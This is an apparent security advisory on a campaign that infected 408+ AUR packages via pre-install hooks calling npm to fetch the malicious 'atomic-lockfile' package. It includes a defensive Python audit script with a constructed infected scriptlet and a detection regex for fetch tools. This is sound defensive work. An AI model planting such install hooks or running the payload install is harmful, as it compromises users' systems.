What’s Happening
It appears that a new AUR maintainer account, impersonating a trusted maintainer, adopted and infected 408+ packages. The compromise was reported, and other AUR maintainers have been working to remove the infected packages.
The attack appears to be ongoing, with shifting indicators.
The affected packages were modified with pre-install scripts that call npm to install the atomic-lockfile package, a malicious payload.
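Because the payload is delivered by an install scriptlet that runs a foreign package manager at install time, one defensive check is to audit pacman install scriptlets for hooks that invoke npm (or any other tool that downloads and runs code outside pacman's own verification). The script below is an added example, not code from this advisory, the AUR, or the linked analysis; the two scriptlets it audits are constructed samples, and the `/var/lib/pacman/local/*/install` layout it scans is assumed to be pacman's default local database location.

```python
#!/usr/bin/env python3
"""Audit pacman install scriptlets for install-time fetches via foreign package managers.

Added example, not from the advisory. The sample scriptlets below are constructed.
"""
import glob
import os
import re
from typing import Dict, List

# Constructed sample mimicking an infected .install file: the pre_install hook
# pulls a package from the npm registry while pacman installs the package.
SAMPLE_INFECTED_SCRIPT = """\
post_install() {
    echo "Finished installing demo-pkg"
}

pre_install() {
    # reads like housekeeping, but executes arbitrary code from the npm registry
    npm install -g atomic-lockfile >/dev/null 2>&1 || true
}

post_upgrade() {
    post_install
}
"""

# Constructed benign scriptlet for comparison.
SAMPLE_CLEAN_SCRIPT = """\
post_install() {
    update-desktop-database -q
}
"""

# Hook functions that pacman executes from an install scriptlet.
HOOK_NAMES = ("pre_install", "post_install", "pre_upgrade",
              "post_upgrade", "pre_remove", "post_remove")
HOOK_RE = re.compile(r"^\s*(" + "|".join(HOOK_NAMES) + r")\s*\(\)\s*\{")

# Tools an install hook has no business invoking: anything that downloads and
# runs code outside pacman's own package verification.
FETCH_RE = re.compile(r"\b(npm|npx|pnpm|yarn|pip3?|curl|wget)\b")

# Indicator named in the advisory. The campaign's indicators shift, so the
# generic FETCH_RE check is the one to rely on; the name is just a fast path.
KNOWN_BAD = ("atomic-lockfile",)


def split_hooks(script: str) -> Dict[str, str]:
    """Return {hook_name: body} for each hook function found in a scriptlet.

    Brace counting is deliberately simple; braces inside strings or comments
    can confuse it, which is acceptable for a triage tool.
    """
    hooks: Dict[str, str] = {}
    current = None
    depth = 0
    body: List[str] = []
    for line in script.splitlines():
        m = HOOK_RE.match(line)
        if current is None:
            if m:
                current = m.group(1)
                depth = line.count("{") - line.count("}")
                body = []
            continue
        depth += line.count("{") - line.count("}")
        if depth <= 0:
            hooks[current] = "\n".join(body)
            current = None
        else:
            body.append(line)
    return hooks


def audit_install_script(script: str) -> List[Dict[str, str]]:
    """Flag hook lines that reference a known-bad package or a foreign fetch tool."""
    findings: List[Dict[str, str]] = []
    for hook, body in split_hooks(script).items():
        for raw in body.splitlines():
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            if any(bad in line for bad in KNOWN_BAD):
                reason = "references known malicious package"
            elif FETCH_RE.search(line):
                reason = "fetches code from outside pacman"
            else:
                continue
            findings.append({"hook": hook, "line": line, "reason": reason})
    return findings


def audit_local_db(root: str = "/var/lib/pacman/local") -> Dict[str, List[Dict[str, str]]]:
    """Audit the scriptlet of every installed package (assumes pacman's default local DB layout)."""
    results: Dict[str, List[Dict[str, str]]] = {}
    for path in sorted(glob.glob(os.path.join(root, "*", "install"))):
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings = audit_install_script(fh.read())
        if findings:
            results[os.path.basename(os.path.dirname(path))] = findings
    return results


if __name__ == "__main__":
    for hit in audit_install_script(SAMPLE_INFECTED_SCRIPT):
        print(f"[{hit['reason']}] {hit['hook']}: {hit['line']}")
    for pkg, hits in audit_local_db().items():
        for hit in hits:
            print(f"{pkg}: [{hit['reason']}] {hit['hook']}: {hit['line']}")
```

Run stand-alone, it reports the constructed infected sample and then scans the installed packages on the host. The check is intentionally broad: a hit on `npm`, `pip`, `curl` or similar inside any hook is worth a look regardless of which package name the payload uses this week, since the advisory notes the indicators are shifting. Scriptlets in `/var/lib/pacman/local` only cover already-installed packages; the same `audit_install_script` function can be run over a PKGBUILD's `.install` file before building.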
Here’s an example of the change:
This blog post has a deep dive into the attack: ioctl.fail, 11 Jun 26, "Preliminary analysis of AUR malware" (Malware Analysis Report: deps, report date 2026-06-11; VirusTotal and Triage links are in the post). The author notes: "The following report was very hastily written by Codex. (I have fact-checked it against the IDA decompilation though.)"
Subsequent messages to the AUR mailing list have identified additional compromised packages with different malware profiles.
Here’s an example: